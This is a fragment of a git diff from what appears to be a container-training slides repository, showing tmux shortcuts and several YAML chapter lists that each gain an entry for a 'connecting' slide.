||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
|
||||
@@ -24,6 +24,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
|
||||
@@ -24,6 +24,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
|
||||
@@ -19,6 +19,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- |
|
||||
name: part-1
|
||||
|
||||
@@ -19,6 +19,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- |
|
||||
name: part-1
|
||||
|
||||
Reference in New Issue
Block a user